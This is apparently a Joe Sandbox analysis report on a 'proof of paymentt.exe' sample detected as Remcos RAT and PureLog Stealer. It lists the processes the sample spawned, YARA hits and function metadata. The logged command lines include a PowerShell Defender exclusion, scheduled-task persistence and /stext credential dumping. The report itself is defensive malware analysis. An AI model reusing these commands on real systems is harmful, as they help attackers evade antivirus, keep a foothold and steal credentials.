Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe"
Imagebase:	0x1d0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:20:53
Start date:	03/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:20:53
Start date:	03/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp73D0.tmp"
Imagebase:	0xac0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:20:53
Start date:	03/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:20:54
Start date:	03/05/2024
Path:	C:\Users\user\Desktop\proof of paymentt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\proof of paymentt.exe"
Imagebase:	0xc70000
File size:	976'896 bytes
MD5 hash:	1EDF4AB8BD9F71ADA01B5CD4763C555D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4459314039.0000000002EDF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4458667961.0000000001320000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4458472507.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	11:20:55
Start date:	03/05/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:20:55
Start date:	03/05/2024
Path:	C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe
Imagebase:	0xab0000
File size:	976'896 bytes
MD5 hash:	1EDF4AB8BD9F71ADA01B5CD4763C555D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2065439154.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:20:56
Start date:	03/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp7E5F.tmp"
Imagebase:	0xac0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:20:56
Start date:	03/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:20:56
Start date:	03/05/2024
Path:	C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe"
Imagebase:	0x6e0000
File size:	976'896 bytes
MD5 hash:	1EDF4AB8BD9F71ADA01B5CD4763C555D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2044389940.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:21:03
Start date:	03/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	11:21:03
Start date:	03/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2492 --field-trial-handle=2368,i,2695784621935690573,1694609991167006164,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	11:21:10
Start date:	03/05/2024
Path:	C:\Users\user\Desktop\proof of paymentt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\vtvkcyiauscpqjziosjypht"
Imagebase:	0xa0000
File size:	976'896 bytes
MD5 hash:	1EDF4AB8BD9F71ADA01B5CD4763C555D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:21:11
Start date:	03/05/2024
Path:	C:\Users\user\Desktop\proof of paymentt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\vtvkcyiauscpqjziosjypht"
Imagebase:	0x750000
File size:	976'896 bytes
MD5 hash:	1EDF4AB8BD9F71ADA01B5CD4763C555D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	11:21:11
Start date:	03/05/2024
Path:	C:\Users\user\Desktop\proof of paymentt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\foaddqtciauctxnmgdeaamokiq"
Imagebase:	0x700000
File size:	976'896 bytes
MD5 hash:	1EDF4AB8BD9F71ADA01B5CD4763C555D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	11:21:11
Start date:	03/05/2024
Path:	C:\Users\user\Desktop\proof of paymentt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\qqgoejdwwimhddbqpnrbdyitqektl"
Imagebase:	0x2c0000
File size:	976'896 bytes
MD5 hash:	1EDF4AB8BD9F71ADA01B5CD4763C555D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:21:11
Start date:	03/05/2024
Path:	C:\Users\user\Desktop\proof of paymentt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\qqgoejdwwimhddbqpnrbdyitqektl"
Imagebase:	0xb30000
File size:	976'896 bytes
MD5 hash:	1EDF4AB8BD9F71ADA01B5CD4763C555D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	263
Total number of Limit Nodes:	10

Executed Functions

Function 07A70D80 Relevance: 5.6, Strings: 4, Instructions: 564
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

paq, xrefs: 07A71286
:, xrefs: 07A7103C
4']q, xrefs: 07A711AB
~, xrefs: 07A70FD2

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID: 4']q$:$paq$~
API String ID: 0-2498672421
Opcode ID: 7f6808b6b7b8d4f00a67a0fb6cd44d1e125d0a8b41000dcf3fc462a0f66b7550
Instruction ID: 221b6c95472779615fce0aa4981ca7fa8945bdb632cff22a2475873c714b9f67
Opcode Fuzzy Hash: 7f6808b6b7b8d4f00a67a0fb6cd44d1e125d0a8b41000dcf3fc462a0f66b7550
Instruction Fuzzy Hash: 0842F6B5A00219DFDB25CFA9C980A99BBF2FF89304F1580E5E519AB221D731DD91DF10

Uniqueness

Uniqueness Score: -1.00%

Function 02BCF146 Relevance: 2.0, Strings: 1, Instructions: 753
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D, xrefs: 02BCF14B

Memory Dump Source

Source File: 00000000.00000002.2037509597.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bc0000_proof of paymentt.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: f3a5353e3a023b16bf935b8b1ec54e00ccfb2fde858f2f2e5a08911e39b766de
Instruction ID: a5411544c2548d57c826582673b2585481c2ae288754adcfc19ce34a8d1660d2
Opcode Fuzzy Hash: f3a5353e3a023b16bf935b8b1ec54e00ccfb2fde858f2f2e5a08911e39b766de
Instruction Fuzzy Hash: 99723CB4A042588FCB64DF64D8987EDBBB2EF89310F2441D9E849A7765DB309E85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 06E12280 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041593765.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e10000_proof of paymentt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6957de16d3fd80faadc34d5323cfcea9773c4fc25b5cf1e9e25e20e54d4f4192
Instruction ID: 2dc591e65fda2dea5e629a90c0e72caaed2be694ea696c93d8137fb981f53a81
Opcode Fuzzy Hash: 6957de16d3fd80faadc34d5323cfcea9773c4fc25b5cf1e9e25e20e54d4f4192
Instruction Fuzzy Hash: 61F1E374D05328CFEB64CFA5C884BEDBBB6BB49300F10A195DA09AB255D730AAC5DF50

Uniqueness

Uniqueness Score: -1.00%

Function 06E1B51D Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041593765.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e10000_proof of paymentt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b96b55015c014dbf6644e377a71504e2b3d045df1625c9a2f00613c49f17fa64
Instruction ID: 43f173e2d6f0e7b90114b3811e088dfe81cf7ee367cea4ea1839e8bc9f018b6b
Opcode Fuzzy Hash: b96b55015c014dbf6644e377a71504e2b3d045df1625c9a2f00613c49f17fa64
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D488 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00D0D516
GetCurrentThread.KERNEL32 ref: 00D0D553
GetCurrentProcess.KERNEL32 ref: 00D0D590
GetCurrentThreadId.KERNEL32 ref: 00D0D5E9

Memory Dump Source

Source File: 00000000.00000002.2036632517.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_proof of paymentt.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: b5ec63bb168cb7a28495d6e308ed3bf5a5cb716a7fb1291ccc5c4b9502bc9cbb
Instruction ID: 22351a8fafd48b4299228cf6399589d9ade6316d4d9db520388cc284be3698dc
Opcode Fuzzy Hash: b5ec63bb168cb7a28495d6e308ed3bf5a5cb716a7fb1291ccc5c4b9502bc9cbb
Instruction Fuzzy Hash: 1B5175B09003488FDB14DFADD948BAEBFF1EF89314F24845AE409A73A0D7799944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D498 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00D0D516
GetCurrentThread.KERNEL32 ref: 00D0D553
GetCurrentProcess.KERNEL32 ref: 00D0D590
GetCurrentThreadId.KERNEL32 ref: 00D0D5E9

Memory Dump Source

Source File: 00000000.00000002.2036632517.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_proof of paymentt.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 23f8999dcc35482269f6afb83505425f566d3b9ccee253714c1ece30a03751b4
Instruction ID: 8457584ff32f0a534bc3230dc9093977190bdb4341cfb11862d224e1f65df3a5
Opcode Fuzzy Hash: 23f8999dcc35482269f6afb83505425f566d3b9ccee253714c1ece30a03751b4
Instruction Fuzzy Hash: 2E5186B09003088FDB04DFAED948BAEBBF5EF89314F248459E409A73A0D7389944CF61

Uniqueness

Uniqueness Score: -1.00%

Function 07A70786 Relevance: 5.2, Strings: 4, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 07A7095D
$]q, xrefs: 07A70894
$]q, xrefs: 07A7087E
$]q, xrefs: 07A70973

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: dbb99960973969637647beac01400a02e141a8dbb0709bdc067547ebe9ab9f5f
Instruction ID: 8db77b2877bda4f70867e0b9a0d1362005d90ccd6309968fcedacfa28c7c3de0
Opcode Fuzzy Hash: dbb99960973969637647beac01400a02e141a8dbb0709bdc067547ebe9ab9f5f
Instruction Fuzzy Hash: 7DA1B874A00159CFDB64DF58C990BADBBB2FF88304F1085A9E809A7355DB319E86DF50

Uniqueness

Uniqueness Score: -1.00%

Function 07A717D1 Relevance: 2.7, Strings: 2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8aq, xrefs: 07A719D2
', xrefs: 07A717F3

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID: '$8aq
API String ID: 0-1019040932
Opcode ID: ba75ad81514b400ec2a6e5a3b218dcc21a9c7309aedb2542a5713126d1263aba
Instruction ID: 9645d9608c3881b3cb0dc9f53c7fd1d3ef09a9847dc33280bc7d1b28f2b14f22
Opcode Fuzzy Hash: ba75ad81514b400ec2a6e5a3b218dcc21a9c7309aedb2542a5713126d1263aba
Instruction Fuzzy Hash: A951D6B4E1524DDFCB00DFA8D980AADBBF5EB8A354F105529E42AE7350D730AA42CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06E17A84 Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E17CC6

Memory Dump Source

Source File: 00000000.00000002.2041593765.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e10000_proof of paymentt.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6bee05f3384f17e968a2b78edcc80cfdec2e12fe816730d4c42089e37a29bd4e
Instruction ID: 9082f8ca04a80bd0eb9e0fb3dc71b495248d7c13da74721546a15227ec2aa19e
Opcode Fuzzy Hash: 6bee05f3384f17e968a2b78edcc80cfdec2e12fe816730d4c42089e37a29bd4e
Instruction Fuzzy Hash: ADA16671D00319CFDF60CF68C841BADBAB2BF48704F1485AAE809AB284DB749985DF91

Uniqueness

Uniqueness Score: -1.00%

Function 06E17A90 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E17CC6

Memory Dump Source

Source File: 00000000.00000002.2041593765.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e10000_proof of paymentt.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: cdd06493bf16ede4282ceaa416653f0b2f358148e99599e0d77451de7cf1e97f
Instruction ID: aeeba6d79c08b29c316bc830c0e5b802f9dd423e6e8458f625134552689cd748
Opcode Fuzzy Hash: cdd06493bf16ede4282ceaa416653f0b2f358148e99599e0d77451de7cf1e97f
Instruction Fuzzy Hash: 25916671D00319CFDF60DF68C841BADBBB2BF49704F1485AAE809AB284DB749985DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00D0B210 Relevance: 1.7, APIs: 1, Instructions: 200COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00D0B466

Memory Dump Source

Source File: 00000000.00000002.2036632517.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_proof of paymentt.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b3d004b08471ed3e5d91b33a170172a6b461b32c966353868f1d29bc4bbf0fd7
Instruction ID: 083c8fd4d6b39f42da94ecc8a7d7a0fa5f955e071011282a53927667ecf227e1
Opcode Fuzzy Hash: b3d004b08471ed3e5d91b33a170172a6b461b32c966353868f1d29bc4bbf0fd7
Instruction Fuzzy Hash: 9A817770A04B058FDB24DF2AD08075ABBF1FF88310F14892ED08AD7A90DB34E845CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02BD1CE4 Relevance: 1.6, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02BD1E02

Memory Dump Source

Source File: 00000000.00000002.2037533820.0000000002BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_proof of paymentt.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: d2acf593520f31b688e159a58f5faa31bb3675e626ce63930458bedcb039cbe0
Instruction ID: fd3faa95f9d86d7d9d9992d52b11bb22bc457a5f4fb94a1823d30cde1c24850a
Opcode Fuzzy Hash: d2acf593520f31b688e159a58f5faa31bb3675e626ce63930458bedcb039cbe0
Instruction Fuzzy Hash: 3F51B1B1D103499FDB14CFA9C984ADEBFB6FF48310F24816AE819AB250D7759845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02BD1CF0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02BD1E02

Memory Dump Source

Source File: 00000000.00000002.2037533820.0000000002BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_proof of paymentt.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 31de5aa78392aa8bc2ccd4399949b31297238edf1196358b9bc1247d2ea55384
Instruction ID: 8e0b80dd1e337ec423fe1fbf5edce4d544d017ea219bec8fa91dd1379094ebf6
Opcode Fuzzy Hash: 31de5aa78392aa8bc2ccd4399949b31297238edf1196358b9bc1247d2ea55384
Instruction Fuzzy Hash: FE41B1B1D103099FDB14CFAAC984ADEBBB5FF48314F64816AE419AB210D7759845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02BD0BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 02BD4381

Memory Dump Source

Source File: 00000000.00000002.2037533820.0000000002BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_proof of paymentt.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 33914fcc4bd905ed02bc62e3ab9bd0d4c46854a8cf171b6515df6fbbd4813d96
Instruction ID: ab50b7a25dd948d957b546949d7b36bce3c6883aea297643c05950abeb46f569
Opcode Fuzzy Hash: 33914fcc4bd905ed02bc62e3ab9bd0d4c46854a8cf171b6515df6fbbd4813d96
Instruction Fuzzy Hash: 1D410AB5A003098FCB14DF99D488AAAFBF5FF88324F24C499D519A7361D375A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D0450C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00D05F41

Memory Dump Source

Source File: 00000000.00000002.2036632517.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_proof of paymentt.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a89d0879b0eb84d9809f548a17fce5b05d0ef73031c16a34dc819b0e6977bc38
Instruction ID: 9c2cf62611239784c2a8869ffc5bceccdbc49122d53c87e29293d0f8f6018fea
Opcode Fuzzy Hash: a89d0879b0eb84d9809f548a17fce5b05d0ef73031c16a34dc819b0e6977bc38
Instruction Fuzzy Hash: 2241FFB0C00719CADB24DFA9C844BDEFBF5BF49304F20806AD408AB295DB756946CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D05E85 Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00D05F41

Memory Dump Source

Source File: 00000000.00000002.2036632517.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_proof of paymentt.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6d7df56c8a70712171aacdbb88cc90503fc44555c3eb6b28c414c5f349e97f2b
Instruction ID: 2f1a680061db02aa05466d8e48326f794c45df080338aaa0e17c984ec5b0cae7
Opcode Fuzzy Hash: 6d7df56c8a70712171aacdbb88cc90503fc44555c3eb6b28c414c5f349e97f2b
Instruction Fuzzy Hash: 2541F1B1C00719CEDB24DFA9C984BDEFBB5BF49304F20806AD409AB295DB756946CF60

Uniqueness

Uniqueness Score: -1.00%

Function 06E17800 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E17898

Memory Dump Source

Source File: 00000000.00000002.2041593765.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e10000_proof of paymentt.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 9a446b1ba2c6e2e3f26cf836f16022b4b7619062fbdb25ba33c6d5ef58c4fa00
Instruction ID: 4cdcc6acf5a8a2c485f62551eac37b6e740cf55d2b3f5f06685bd8b28e2ce2a8
Opcode Fuzzy Hash: 9a446b1ba2c6e2e3f26cf836f16022b4b7619062fbdb25ba33c6d5ef58c4fa00
Instruction Fuzzy Hash: 142135B59003199FCF10DFA9C985BEEBBF1FF48314F10842AE519A7250D7799941DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06E17808 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E17898

Memory Dump Source

Source File: 00000000.00000002.2041593765.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e10000_proof of paymentt.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 9d63d2bd9ce467b2fa3ca3bc71cf026a5fe44437185c7d62ddd9db600b060a50
Instruction ID: b3eddf0e8c705e6f1acfff795e564a653cb84095997a2a1b51f375a2671695bf
Opcode Fuzzy Hash: 9d63d2bd9ce467b2fa3ca3bc71cf026a5fe44437185c7d62ddd9db600b060a50
Instruction Fuzzy Hash: 6F2113B59003599FCF10DFAAC985BEEBBF5FF48314F10842AE919A7240D7789944DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06E178F0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E17978

Memory Dump Source

Source File: 00000000.00000002.2041593765.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e10000_proof of paymentt.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 942ec845a1bc4baf0e741ff6a2cfc433cc94b3fc873831a1edde49ceb25ebace
Instruction ID: b0a41c349d96e1625ea8bb9aa9e3eec2ab1a57c23d44f94dfca89ed284ff6924
Opcode Fuzzy Hash: 942ec845a1bc4baf0e741ff6a2cfc433cc94b3fc873831a1edde49ceb25ebace
